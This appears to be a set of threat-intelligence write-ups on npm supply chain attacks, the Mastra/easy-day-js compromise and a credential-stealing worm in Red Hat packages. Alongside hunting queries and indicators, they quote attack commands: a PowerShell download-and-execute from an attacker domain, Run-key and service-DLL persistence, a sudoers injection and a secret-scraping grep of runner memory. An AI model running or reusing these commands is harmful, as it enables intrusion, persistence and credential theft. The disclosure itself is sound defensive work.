A malicious dependency the attackers added to over 140 Mastra packages fetches a payload targeting cryptocurrency extensions.
The post North Korean Hackers Blamed for Mastra NPM Supply Chain Attack appeared first on SecurityWeek.
June 19, 2026 update: Microsoft assesses with high confidence that this activity is attributable to Sapphire Sleet, a North Korean state actor that primarily targets the financial sector. The infrastructure and post-compromise TTPs observed in this campaign are consistent with previously documented Sapphire Sleet activity. Sapphire Sleet also conducted a separate npm supply chain compromise affecting Axios, a popular JavaScript HTTP client, in April 2026.
Microsoft Threat Intelligence observed a large-scale npm supply chain attack affecting 140+ packages across the mastra and @mastra scopes on the npm registry. Microsoft shared its findings with the npm security team, the compromised packages have been removed and the attacker’s publish access to the @mastra scope has been revoked. The compromise originated from the takeover of the ehindero npm maintainer account, which had publish rights across the Mastra ecosystem and was used to publish poisoned package versions that introduced easy-day-js, a malicious typosquat of the popular dayjs library. Microsoft assesses with high confidence that this activity is attributable to Sapphire Sleet.
Once installed, easy-day-js triggered a postinstall hook that executed an obfuscated dropper script, disabled Transport Layer Security (TLS) certificate verification, contacted attacker-controlled command-and-control (C2) infrastructure, downloaded a second-stage payload, and executed the payload as a detached hidden process. The activity followed a coordinated staged delivery pattern, with a clean bait version published first, followed by a weaponized version and rapid publication of the compromised Mastra packages.
Because the payload executes during installation, any developer workstation or continuous integration and continuous delivery (CI/CD) pipeline that ran npm install or npm update after the compromised versions were published was potentially exposed, regardless of whether the package was imported in application code. This created risk to credentials, tokens, build environments, and downstream software integrity. Microsoft Defender Antivirus, Microsoft Defender for Endpoint, and Microsoft Defender XDR provide detections and hunting coverage for suspicious Node.js execution, malicious package behavior, reflective code loading, persistence activity and command-and-control communication.
At a high level, the attack progressed through seven phases:
Microsoft Threat Intelligence identified the compromise through anomalous publishing patterns on the mastra package. All previous versions of mastra (through v1.13.0) were published through GitHub Actions OpenID Connect (OIDC), the legitimate CI/CD pipeline. Version 1.13.1 was manually published by ehindero using a Tutamail address, an anonymous email service.
The only change between mastra@1.13.0 and mastra@1.13.1 was the addition of easy-day-js@^1.11.21 as a dependency. No corresponding code changes were present in the Mastra GitHub repository. Both the compromised publisher (ehindero2016@tutamail.com) and the typosquat publisher (sergey2016@tutamail.com) used the same anonymous email provider, Tutamail.
The compromised mastra@1.13.1 package.json reveals the injected dependency alongside the anomalous publisher metadata:
The easy-day-js dependency was not present in any prior versions of mastra npm packages. Its addition, paired with the SemVer range ^1.11.21, ensures that the npm resolves to the weaponized 1.11.22 release.
The easy-day-js package is a deliberate impersonation of the legitimate dayjs library:
| Attribute | Legitimate dayjs | Malicious easy-day-js |
| Maintainer | iamkun <kunhello@outlook[.]com> | sergey2016 <sergey2016@tutamail[.]com> |
| Claimed author | iamkun | iamkun (impersonated) |
| Repository URL | github.com/iamkun/dayjs | github.com/iamkun/dayjs (copied) |
| Weekly downloads | 57,251,792 | newly created |
| Version count | 89+ versions since 2018 | 2 versions (both June 16, 2026) |
| postinstall script | None | node setup.cjs –no-warnings (v1.11.22) |
The typosquat used a two-phase delivery strategy:
The weaponized package.json in version 1.11.22 exposes the postinstall hook:
Stage 0: Obfuscated dropper (setup.cjs)
The setup.cjs payload is protected with JavaScript obfuscation using rotated string arrays and a custom base64 decoder function:
The obfuscation technique uses a common pattern: an array of 40 Base64-encoded strings is shuffled at initialization using a numeric seed (0x4c11d), then accessed through a decoder function that performs Base64 decoding with character substitution. This prevents static analysis tools from extracting meaningful strings.
Stage 1: String table decryption
Decoding the rotated string array reveals the payload’s true capabilities:
Key decoded strings include the secondary C2 address (23.254.164[.]123:443), Node.js built-in module references (node:child_process, node:os), and file system operations (writeFileSync, rmSync).
Stage 2: Deobfuscated payload logic
After resolving all string references and control flow, the full payload logic emerges as a five-step attack sequence:
Step 1: Disable TLS verification. The payload sets NODE_TLS_REJECT_UNAUTHORIZED to ‘0’, disabling certificate validation for all HTTPS requests in the Node.js process. This enables communication with the C2 server without valid certificates.
Step 2: Drop filesystem markers. Two tracking files are written to the OS temp directory: $TMPDIR/.pkg_history contains the install path of the compromised package, and $TMPDIR/.pkg_logs contains the package name encoded with XOR 0x80:
Step 3: Fetch second-stage payload. The dropper issues a GET request to hxxps://23.254.164[.]92:8000/update/49890878 and reads the response body as text.
The second-stage payload is a ~41 KB cross-platform Node.js tasking client. Unlike a fire-and-forget stealer, the implant installs sign-in persistence, sends a Start beacon to the C2, then enters a repeated Check poll loop. Tasks returned by the server are dispatched to built-in runners (a Node runner and a Shell runner), and it honors configuration update and exit commands, meaning the operator can push and execute arbitrary follow-on code on the host at any time. On Windows, the payload additionally executes reflective .NET assembly injection for in-memory code execution.
Step 3.A: Windows execution chain. On Windows, the payload performs host reconnaissance and reflective in-memory code execution before establishing persistence.
The payload enumerates all installed applications across three sources—Start Menu entries (Get-StartApps), registry Uninstall keys, and UWP packages (Get-AppxPackage)—to fingerprint the compromised host:
Each enumeration is wrapped in try/catch with silent error handling. The deduplicated results are exfiltrated back to the C2 for victim profiling, enabling the attacker to identify installed security products and high-value targets.
A second PowerShell script receives two C2 endpoint URLs through the SCRIPT_ARGS environment variable. It disables SSL certificate validation and defines an HTTP POST function that Base64-encodes request bodies using a legacy IE8 User-Agent string:
The first C2 request downloads a .NET DLL that is loaded directly into memory via reflection, completely bypassing disk-based detection. The script resolves the Extension.SubRoutine class and invokes its Run2 method with a second downloaded payload, the path to cmd.exe, and the C2 callback address:
This pattern is consistent with process injection, where the payload is injected into a cmd.exe process that communicates back to the C2 over HTTPS (port 443). The entire chain is fileless—no artifacts are written to disk.
Step 3.B: Cross-platform persistence. The implant installs login persistence on all three major operating systems, using a consistent NVM/Node masquerade theme across platforms:
| OS | Persistence mechanism | Drop location | Artifact name |
| Windows | Registry Run key (HKCU\…\CurrentVersion\Run) | C:\ProgramData\NodePackages\ | NvmProtocal |
| macOS | LaunchAgent (RunAtLoad) | ~/Library/NodePackages/ | com.nvm.protocal.plist |
| Linux | systemd user unit (WantedBy=default.target) | ~/.config/systemd/nvmconf/ | nvmconf.service |
On Windows, the Run key launches a hidden PowerShell process that invokes Node.js:
On Linux, the systemd user unit restarts the implant on failure with a 5-second delay:
All three persistence paths drop the implant as protocal.cjs (a deliberate misspelling) into directories named to mimic legitimate Node.js installations. The value name NvmProtocal, the macOS label com.nvm.protocal, and the Linux unit nvmconf.service are deliberately designed to blend into a developer workstation.
Step 3.C: Collection and exfiltration. The implant performs the following collection before exfiltrating to the C2:
Collected data is exfiltrated using a custom ICAP-style protocol over HTTPS POST (reqmod, PrimaryUrl, SecondaryUrl headers), with hostnames resolved through node:dns and traffic carrying a spoofed legacy IE8 User-Agent string.
Following successful exfiltration, the implant’s shell runner capability enables the operator to pivot from automated collection to interactive hands-on-keyboard access.
Microsoft observed the actor delivering a dedicated PowerShell backdoor from separate C2 infrastructure, representing an escalation to persistent, actor-controlled access on high-value targets. The PowerShell backdoor, tradecraft, and C2 infrastructure have been used by Sapphire Sleet in other, prior campaigns.
Step 3.D: Backdoor delivery. Through the Node.js implant’s shell runner capability, Sapphire Sleet downloads and executes a PowerShell script from a separate attacker-controlled domain:
powershell -w h -c "iwr -UseBasicParsing https[:]//teams[.]onweblive[.]org/api/update/8555575039/4|iex"
Upon execution, the script immediately performs anti-forensic cleanup by deleting the PowerShell command history file and disabling future history recording:
Remove-Item (Get-PSReadLineOption).HistorySavePath -Force Set-PSReadLineOption -HistorySaveStyle SaveNothing
Step 3.E: Host fingerprinting and C2 registration. The backdoor generates a unique 16-character alphanumeric victim identifier and collects detailed host metadata—username, hostname, OS version, boot time, architecture, admin status, installed antivirus products, installed applications (via registry Uninstall keys and desktop shortcuts), and browser extensions for Chrome, Brave, and Edge. This reconnaissance data is packaged into a JSON info beacon and sent to the C2 via HTTP POST:
Login
$info_pkt = @{ type = "info" targetId = $uid currentTime = [int64][DateTimeOffset]::UtcNow.ToUnixTimeSeconds() data = @{ username=$username; hostname=$hostname; timezone=$timezone; bootTime=$bootTime; os="windows"; version=$version; arch=$arch; applist=[string[]]$applist; extlist=[string[]]$extlist; admin=$admin; vaccine=[string[]]$vaccine } }
All network communication uses a spoofed legacy IE8 User-Agent string (mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)) and HTTP POST with URL-encoded or JSON bodies. The script enters an infinite polling loop, beaconing every 10 seconds and backing off to 180-second intervals on network failure.
Step 3.F: Persistence and remote code execution. The backdoor establishes a separate persistence mechanism independent of the Node.js implant’s NvmProtocal Run key. It writes a hidden batch file to C:\ProgramData\system.bat and registers it under a deceptive Run key value named MicrosoftUpdate:
$batFile = Join-Path $env:PROGRAMDATA "system.bat" $batCont = 'start /min powershell -w h -c "& ([scriptblock]::Create(' + '[System.Text.Encoding]::UTF8.GetString((Invoke-WebRequest -UseBasicParsing ' + "-Uri '$url' -Method POST -Body 'wwps').Content))) '$url'" Set-Content -Path $batFile -Value $batCont -Encoding ASCII Set-ItemProperty -Path $batFile -Name Attributes -Value Hidden Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "MicrosoftUpdate" -Value $batFile
This persistence loader re-fetches the backdoor body from the C2 on every logon by POSTing the keyword wwps, enabling the attacker to silently rotate the live payload without touching the endpoint. When the C2 responds with a script command, the backdoor decodes a Base64-encoded PowerShell payload, writes it to a temporary file (%TEMP%\{guid}.ps1), and executes it with -ExecutionPolicy Bypass in a hidden window:
$scpt = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Command.scriptfile)) $tempFile = Join-Path $env:TEMP ("{0}.ps1" -f ([Guid]::NewGuid().ToString("N"))) Set-Content -Path $tempFile -Value $scpt -Encoding UTF8 -Force $cln = @("-NoProfile","-ExecutionPolicy","Bypass","-File",$tempFile) + $uid + $url Start-Process powershell.exe -WindowStyle Hidden -ArgumentList $cln
Step 3.G: Defense evasion and service-level persistence. After establishing interactive access, the operator escalates by adding a Microsoft Defender exclusion for C:\Windows\System32 to suppress detection of dropped tooling, then installs a persistent service that loads a malicious DLL at boot:
sc create scdev binPath= "c:\windows\system32\svchost.exe -k scdev" type= share start= auto reg add HKLM\SYSTEM\CurrentControlSet\services\scdev\Parameters /v ServiceDll /t REG_EXPAND_SZ /d c:\windows\system32\scdev.dll /f
The scdev service runs as a shared svchost.exe process under the SYSTEM context with automatic startup, providing Sapphire Sleet with boot-persistent, elevated access independent of user logon. This represents the final escalation stage—from a supply chain package compromise through automated credential theft to full interactive control with SYSTEM-level persistence.
Every package published by the ehindero account contained easy-day-js as an injected dependency. Packages last published by GitHub Actions CI/CD or other legitimate maintainers were not affected.
Attack timeline
| Timestamp (UTC) | Event |
| June 16, 07:05 | easy-day-js@1.11.21 published (clean bait, no payload) |
| June 17, 01:01 | easy-day-js@1.11.22 published (adds postinstall with setup.cjs) |
| June 17, 01:20 | mastra@1.13.1 and 140+ other @mastra/* packages published with easy-day-js dependency |
** Microsoft Threat Intelligence monitoring observed easy-day-js@1.11.22 at 01:07 UTC and mastra@1.13.1 at 01:28 UTC on June 17, 2026
Sapphire Sleet is a North Korean state actor that has been active since at least March 2020. The threat actor focuses primarily on the finance sector, including cryptocurrency, venture capital, and blockchain organizations. These targets are often global, with a particular interest in the United States, as well as countries in Asia and the Middle East. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
Sapphire Sleet often leverages social networking sites, such as LinkedIn, to initiate contact by directing users to click links, leading to malicious files hosted on attacker-controlled cloud storage services such as OneDrive or Google Drive, using domains masquerading as financial institutions like United States-based banks or cryptocurrency pages, and fraudulent meeting links that impersonate legitimate video conferencing applications, such as Zoom. Sapphire Sleet overlaps with activity tracked by other security vendors as UNC1069, STARDUST CHOLLIMA, Alluring Pisces, BlueNoroff, CageyChameleon, or CryptoCore.
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| Initial access | Suspicious script execution during npm install or package lifecycle activity | Microsoft Defender Antivirus – Trojan:JS/NpmStealz.Z!MTB – Trojan:JS/NpmStealz.ZA!MTB Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious Node.js script execution |
| Execution ( Stage 1 ) | Postinstall hook automatically executes obfuscated setup.cjs dropper (4,572 bytes) during npm install; | Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious Node.js script execution |
| Execution / Defense evasion (Stage 2) | Second-stage payload: Reflective .NET assembly injection: PowerShell downloads DLL, loads via [Reflection.Assembly]::Load(), invokes Extension.SubRoutine.Run2 method to inject payload into cmd.exe process; entire chain is fileless | Microsoft Defender Antivirus Trojan:JS/NpmSteal.DB!MTB Trojan:PowerShell/PsExec.DE!MTB Microsoft Defender for Endpoint -Process loaded suspicious .NET assembly -A process was injected with potentially malicious code -Reflective code loading (Fileless In-Memory Execution) Microsoft Defender for Cloud -Possible AI Tools Reconnaissance Detected -Possible Secret Reconnaissance Detected -Access to cloud metadata service detected -Possible Post-Compromise Activity Detected in CICD Runner |
| Persistence | Registry Run key created, executing hidden PowerShell that launches protocal.cjs on every user login | Microsoft Defender for Endpoint – Anomaly detected in ASEP registry |
| Command and control | GET request to hxxps://23.254.164[.]92:8000/update/49890878 and reads the response body as text. | Microsoft Defender for Endpoint – Command-line process communicating with malicious network endpoint |
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
The following KQL queries can be used in Microsoft Defender XDR Advanced Hunting to identify potential exposure to this supply chain compromise.
Detect postinstall execution of setup.cjs
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in ("node", "node.exe")
| where ProcessCommandLine has "setup.cjs"
or ProcessCommandLine has "easy-day-js"
| where ProcessCommandLine has “--no-warnings”
| project Timestamp, DeviceName, AccountName,
ProcessCommandLine, FolderPath, InitiatingProcessFileName
| sort by Timestamp desc
Outbound connections to C2 infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("23.254.164.92", "23.254.164.123")
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
Network indicators
| Indicator | Type | Description |
| 23.254.164.92 | IP address | Primary C2 server |
| 23.254.164.123 | IP address | Secondary C2 address (from deobfuscated strings) |
| https[:]//23[.]254[.]164[.]92:8000/update/49890878 | URL | Payload download endpoint |
| teams[.]onweblive[.]org | Domain | Post Compromise PowerShell backdoor delivery domain |
| https[:]//teams[.]onweblive[.]org/api/update/8555575039/4 | URL | Post Compromise PowerShell backdoor download endpoint |
| maskasd[.]com | Domain | Post Compromise C2 beacon domain |
| https[:]//maskasd[.]com/8555575039 | URL | Post Compromise C2 beacon endpoint |
File indicators
| Indicator | Type | Description |
| B122A9873BEDF145AE2A7FD024B5F309007DBB025149F4DC4AC3F7E4F32A36A4 | SHA-256 | setup.cjs (malicious postinstall dropper) |
| AE70DD4F6BC0D1C8C2848E4E6B51934626C4818DCB5AF99D080DDBD7DC337185 | SHA-256 | easy-day-js-1.11.22.tgz (weaponized tarball) |
| 4A8860240E4231C3A74C81949BE655A28E096A7D72F38FBE84E5B37636B98417 | SHA-256 | easy-day-js-1.11.21.tgz (clean bait tarball) |
| B73DE25C053C3225A077738A1FCBD9CA6966D7B3CD6F5494A30F0AA0EAE55C7E | SHA-256 | mastra-1.13.1.tgz (compromised CLI tarball) |
| 221c45a790dec2a296af57969e1165a16f8f49733aeab64c0bbd768d9943badf | SHA-256 | protocol.cjs |
| 50eae63d3e24be9ca8803f4b5a0408aef97ee3fab7af018d8c2dde7c359edd65 | SHA-256 | Downloader and backdoor PowerShell script |
| 1d1bf5e8c1539d2f05b1429235b8f4990f87036774be95157b315a7803dd5526 | SHA256 | Second stage Powershell Script |
Host indicators
| Indicator | Type | Description |
| $TMPDIR/.pkg_history | File artifact | Contains the install path of the compromised package |
| $TMPDIR /.pkg_logs | File artifact | Contains XOR 0x80 encoded string “easy-day-js” |
| <homedir>/<random_hex>.js | File artifact | Downloaded second-stage payload |
Package indicators
| Indicator | Type | Description |
| easy-day-js | npm package | Malicious typosquat of dayjs |
| sergey2016 | npm account | Publisher of easy-day-js |
| ehindero | npm account | Compromised publisher of 140+ Mastra packages |
This research is provided by Microsoft Defender Security Research, Suriyaraj Natarajan, Sagar Patil, Rajesh Kumar Natarajan, Mahesh Mandava, Arvind Gowda, and with contributions from members of Microsoft Threat Intelligence.
For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.
To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
The post From package to postinstall payload: Inside the Mastra npm supply chain compromise by Sapphire Sleet appeared first on Microsoft Security Blog.
By default, npm install will no longer execute scripts from dependencies, unless explicitly allowed.
The post NPM 12 Will Change Script Execution Behavior to Prevent Supply Chain Attacks appeared first on SecurityWeek.
The most recent variants of the self-propagating attacks are named Miasma and Hades.
The post Over 100 NPM, PyPI Packages Hit in New Shai-Hulud Supply Chain Attacks appeared first on SecurityWeek.
Microsoft Threat Intelligence identified a large-scale npm supply chain attack affecting 32 maliciously modified packages across more than 90 versions under the @redhat-cloud-services npm scope. The compromise originated from the upstream RedHatInsights/javascript-clients Continuous Integration and Continuous Delivery (CI/CD) pipeline, allowing attackers to publish trojanized packages through the legitimate GitHub Actions OpenID Connect (OIDC) publishing workflow. As a result, the malicious packages carried authentic provenance signatures while embedding the campaign marker “Miasma: The Spreading Blight.”
Once installed, the trojanized packages triggered an npm preinstall hook that executed a heavily obfuscated 4.29 MB dropper script. Through multiple layers of obfuscation and encryption, the malware downloaded the Bun JavaScript runtime and launched a secondary payload designed to harvest credentials from GitHub, npm, Amazon Web Service (AWS), Azure, Google Cloud Platform (GCP), HashiCorp Vault, Kubernetes, and developer systems. The malware also attempted to propagate by compromising additional maintainer packages and, in some scenarios, could destroy the maintainer’s home directory.
The payload operated across Linux, macOS, and Windows by dynamically downloading the correct Bun runtime for each platform, although Linux CI/CD runners appeared to be the primary target. On developer systems, the malware stole Secure Shell (SSH) keys, command-line interface (CLI) credentials, browser and wallet data, while in CI/CD environments it scraped GitHub Actions runner memory for secrets, escalated privileges using passwordless sudo, and republished poisoned packages with forged Supply-chain Levels for Software Artifacts (SLSA) provenance to continue downstream propagation. Microsoft shared its findings with the npm team, leading to the removal of affected repositories and the implementation of additional protections on the @redhat-cloud-services namespace to prevent unauthorized publishing.
At a high level, the malware payload progresses through 10 phases:
The payload replaces the legitimate index.js with a single-line obfuscated script.
Stage 0 – Malicious preinstall trigger: The attack begins in package.json, where a weaponized preinstall hook automatically executes during npm install, allowing the malware to run through both direct and transitive dependency installation. The modified packages also replaced the original index.js while leaving source-map metadata unchanged, indicating probable release-pipeline tampering.
Stage 1 – Multi-layer JavaScript obfuscation: The 4.29 MB index.js dropper uses layered obfuscation, beginning with a large character-code array reconstructed at runtime, decoded through a ROT-XX (Caesar cipher) transformation, and dynamically executed via eval().
Stage 2 – AES-encrypted payloads and Bun runtime abuse: The next layer decrypts two AES-128-GCM encrypted blobs: one downloads the Bun runtime from official Bun infrastructure, while the second contains the primary payload. The malware then executes the payload via Bun, creating an unusual process chain (node → shell → bun → payload) designed to evade Node-focused monitoring and detections.
Stage 3 – Obfuscator.io string-array protection: The Bun-executed payload is additionally protected using Obfuscator.io techniques, including rotated string arrays, decoder functions, and hundreds of alias wrappers that conceal nearly every string and identifier from static analysis.
Stage 4 – Custom cryptographic string cipher: Sensitive strings remain protected behind a bespoke encryption routine that derives keys using PBKDF2-HMAC-SHA-256 with 200,000 iterations, followed by multiple SHA-256-seeded permutation and XOR stages, significantly complicating reverse engineering and static extraction.
The payload targets secrets across multiple providers:
The payload locates the GitHub Actions Runner.Worker PID using /proc scanning, then extracts runtime secrets using the following:
// Locates Runner.Worker PID via /proc 'findRunnerWorkerPIDLinux' // Scans /proc//cmdline for "Runner.Worker" // Extracts secrets from process memory tr -d '\0' | grep -aoE '"[^"]+":{"value":"[^"]*","isSecret":true}' | sort -u
This activity bypasses normal secret masking by reading secrets directly from runner process memory.
The payload performs the following actions to escalate its privileges:
// Injects passwordless sudo via /etc/sudoers.d bind mount at /mnt echo 'runner ALL=(ALL) NOPASSWD:ALL' > && chmod 0440 /mnt/runner // Neutralize Security product monitoring sudo sh -c "echo '127.0.0.1' >> /etc/hosts" // Validates sudo access before operations sudo -n true
The malware abuses GitHub and victim-owned assets instead of a single easy-to-block C2 endpoint:
Channel A (victim-owned repo drop): Creates a public repo in the victim’s GitHub account (“Miasma: The Spreading Blight”) and commits stolen credential JSON to results/<timestamp>-<counter>.json. Repo names are randomized (adjective-creature-<0–99999>), spreading indicators.
Channel B (code propagation): Injects its own source as .github/setup.js into non-protected branches across victim-owned repos via Git Data API (blob → tree → commit → ref update). Skips protected/default branches and common bot/release branches; uses chore: update dependencies [skip ci] with spoofed github-actions@github.com.
Channel C (dormant HTTPS sender): Includes a disabled POST path to api.anthropic.com:443/v1/api (noop: true in this sample). The same domain is used to validate stolen Anthropic keys (for example, ~/.claude.json), indicating a swappable live exfiltration path.
C2 is not tied to one account; it rotates across a pool of 16 attacker-controlled GitHub accounts per session. Stolen tokens are double-Base64 encoded in transit, and traffic is masked with python-requests/2.31.0 user-agent spoofing
The malware spreads across repositories while maintaining access through credential theft, supply-chain forgery, and destructive safeguards:
This attack has a wide blast radius, affecting packages, credentials, and downstream systems.
Our investigation uncovered the following affected packages and versions.
| Package (@redhat-cloud-services/…) | Malicious versions |
| types | 3.6.1, 3.6.2, 3.6.4 |
| frontend-components-utilities | 7.4.1, 7.4.2, 7.4.4 |
| frontend-components | 7.7.2, 7.7.3, 7.7.5 |
| rbac-client | 9.0.3, 9.0.4, 9.0.6 |
| javascript-clients-shared | 2.0.8, 2.0.9, 2.0.11 |
| frontend-components-config-utilities | 4.11.2, 4.11.3, 4.11.5 |
| frontend-components-notifications | 6.9.2, 6.9.3, 6.9.5 |
| tsc-transform-imports | 1.2.2, 1.2.4, 1.2.6 |
| frontend-components-config | 6.11.3, 6.11.4, 6.11.6 |
| eslint-config-redhat-cloud-services | 3.2.1, 3.2.2, 3.2.4 |
| host-inventory-client | 5.0.3, 5.0.4, 5.0.6 |
| rule-components | 4.7.2, 4.7.3, 4.7.5 |
| frontend-components-remediations | 4.9.2, 4.9.3, 4.9.5 |
| frontend-components-translations | 4.4.1, 4.4.2, 4.4.4 |
| vulnerabilities-client | 2.1.9, 2.1.11 |
| frontend-components-advisor-components | 3.8.2, 3.8.4, 3.8.6 |
| entitlements-client | 4.0.11, 4.0.12, 4.0.14 |
| chrome | 2.3.1, 2.3.2, 2.3.4 |
| notifications-client | 6.1.4, 6.1.5, 6.1.7 |
| compliance-client | 4.0.3, 4.0.4, 4.0.6 |
| sources-client | 3.0.10, 3.0.11, 3.0.13 |
| integrations-client | 6.0.4, 6.0.5, 6.0.7 |
| frontend-components-testing | 1.2.1, 1.2.2, 1.2.4 |
| remediations-client | 4.0.4, 4.0.5, 4.0.7 |
| insights-client | 4.0.4, 4.0.5, 4.0.7 |
| topological-inventory-client | 3.0.10, 3.0.11, 3.0.13 |
| config-manager-client | 5.0.4, 5.0.5, 5.0.7 |
| hcc-pf-mcp | 0.6.1, 0.6.2, 0.6.4 |
| quickstarts-client | 4.0.11, 4.0.12, 4.0.14 |
| patch-client | 4.0.4, 4.0.5, 4.0.7 |
| hcc-feo-mcp | 0.3.1, 0.3.2, 0.3.4 |
| hcc-kessel-mcp | 0.3.1, 0.3.2, 0.3.4 |
Microsoft recommends the following mitigations to reduce the impact of this threat:
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
| Tactic | Observed activity | Microsoft Defender coverage |
| Initial access / Execution | Suspicious script execution during npm install or package lifecycle activity | Microsoft Defender Antivirus – Trojan:JS/ShaiWorm.DAW!MTB – Trojan:JS/ObfusNpmJs Microsoft Defender for Endpoint – Suspicious Node.js process behavior – Suspicious installation of Bun runtime Microsoft Defender XDR – Suspicious file creation in temporary directory by node.exe – Suspicious Bun execution from Node.js process |
| Execution / Defense evasion | Four-layer obfuscation (ROT XX) → AES-128-GCM → string-array → custom cipher); Bun runtime download and execution to move off Node.js; process lineage node → sh → bun to evade detection | Microsoft Defender for Endpoint – Suspicious usage of Bun runtime – Suspicious installation of Bun runtime – Suspicious Node.js process behavior – Suspicious script execution via Bun Microsoft Defender for Cloud – Suspicious supply-chain compromise activity detected |
| Credential access | Multi-platform harvester targeting GitHub, npm, AWS IMDS/ECS, Azure IMDS, GCP, Vault, K8s, CircleCI; runner process-memory scraping to unmask secrets; anthropic API key theft | Microsoft Defender for Endpoint – Credential access attempt – Kubernetes secrets enumeration indicative of credential access Microsoft Defender for Cloud – Sha1-Hulud Campaign Detected: Possible command injection to exfiltrate credentials Microsoft Defender for Identity – Anomalous token request patterns – Suspicious enumeration of organizational secrets |
| Exfiltration | Public GitHub repo creation under victim’s account with stolen credential JSON; Git Data API commits to non-protected branches; domain-sender fallback to (dormant) api.anthropic.com | Microsoft Defender for Cloud Apps – Suspicious GitHub API activity (repo creation, commit patterns) – Unusual data volume in commits – Authentication from unusual IP/location |
| Impact / Worm propagation | npm OIDC token exchange republishing; forged Sigstore/SLSA provenance; self-injection (.github/setup.js) into victim repos on non-protected branches | Microsoft Defender for Cloud Apps – Suspicious npm package republish via OIDC – Anomalous use of bypass_2fa parameter – Packages publish from unusual location/time |
Microsoft Defender XDR customers can reference the Threat analytics report for this campaign in the Microsoft Defender portal at https://security.microsoft.com/threatanalytics3 for the latest indicators, recommended actions, and mitigation status across their estate.
The following KQL queries can be used in Microsoft Defender XDR Advanced Hunting to identify potential exposure to this supply-chain compromise.
Bun execution from temporary directories
DeviceProcessEvents
| where FileName == "bun" or ProcessCommandLine has "bun run"
| where FolderPath startswith "/tmp/" or FolderPath startswith @"C:\Users\*\AppData\Local\Temp"
| project Timestamp, DeviceName, InitiatingProcessFileName,
ProcessCommandLine, FolderPath, AccountName
| sort by Timestamp desc
Bun execution from temporary directory (CloudProcessEvents)
CloudProcessEvents
| where Timestamp > ago(7d)
| where ProcessName =~ "bun"
or ProcessCommandLine has "bun run"
| where FolderPath startswith "/tmp/"
or ProcessCommandLine matches regex @"/tmp/[^ ]*bun"
| project Timestamp, TenantId, AzureResourceId,
KubernetesNamespace, KubernetesPodName,
ContainerName, ContainerImageName, ContainerId,
AccountName,
ProcessName, FolderPath, ParentProcessName, ProcessCommandLine,
UpperLayer = tostring(AdditionalFields.UpperLayer),
DriftAction = tostring(AdditionalFields.DriftAction),
Memfd = tostring(AdditionalFields.Memfd)
| sort by Timestamp desc
Bun download activity
CloudProcessEvents
| where Timestamp > ago(7d)
| where ProcessName in~ ("curl","wget")
| where ProcessCommandLine matches regex
@"https?://[^\s""']*?(github\.com/oven-sh/bun/releases|release-assets\.githubusercontent\.com/[^\s""']*?bun-(linux|darwin|windows)|/bun-(linux|darwin|windows)-(x64|aarch64|arm64)\.zip)"
| extend BunUrl = extract(
@"(https?://[^\s""']*?(?:github\.com/oven-sh/bun/releases|release-assets\.githubusercontent\.com/[^\s""']*?bun-(?:linux|darwin|windows)|/bun-(?:linux|darwin|windows)-(?:x64|aarch64|arm64)\.zip)[^\s""']*)",
1, ProcessCommandLine),
OutputPath = extract(@"-[oO]\s+[""']?(\S+?)[""']?(\s|$)", 1, ProcessCommandLine)
| project Timestamp, TenantId, AzureResourceId,
KubernetesNamespace, KubernetesPodName,
ContainerImageName, ContainerId,
ProcessName, ParentProcessName, ParentProcessId,
BunUrl, OutputPath, ProcessCommandLine,
UpperLayer = tostring(AdditionalFields.UpperLayer)
| sort by Timestamp desc
npm → Node → Bun process chain
DeviceProcessEvents
| where InitiatingProcessFileName in ("node", "node.exe")
| where FileName == "bun" or FileName == "bun.exe"
| join kind=inner (
DeviceProcessEvents
| where InitiatingProcessFileName in ("npm", "npm.cmd")
| where FileName in ("node", "node.exe")
) on DeviceId, $left.InitiatingProcessId == $right.ProcessId
| project Timestamp, DeviceName, AccountName,
NpmCommandLine = ProcessCommandLine1,
BunCommandLine = ProcessCommandLine
Cloud metadata endpoint access from build processes
DeviceNetworkEvents
| where RemoteIP in ("169.254.169.254", "169.254.170.2")
| where InitiatingProcessFileName in ("node", "node.exe", "bun", "bun.exe")
| project Timestamp, DeviceName, RemoteIP, RemoteUrl,
InitiatingProcessFileName, InitiatingProcessCommandLine
GitHub repository creation activity
CloudAppEvents
| where ActionType == "CreateRepository" or RawEventName == "repo.create"
| where Application == "GitHub"
| where AccountType == "ServiceAccount" or ActorType has "Integration"
| project Timestamp, AccountDisplayName, ActionType, RawEventName,
IPAddress, City, CountryCode
Process memory access (runner scraping)
DeviceProcessEvents
| where FileName == "grep"
| where ProcessCommandLine has_all ("value", "isSecret\":true")
npm token enumeration
DeviceNetworkEvents
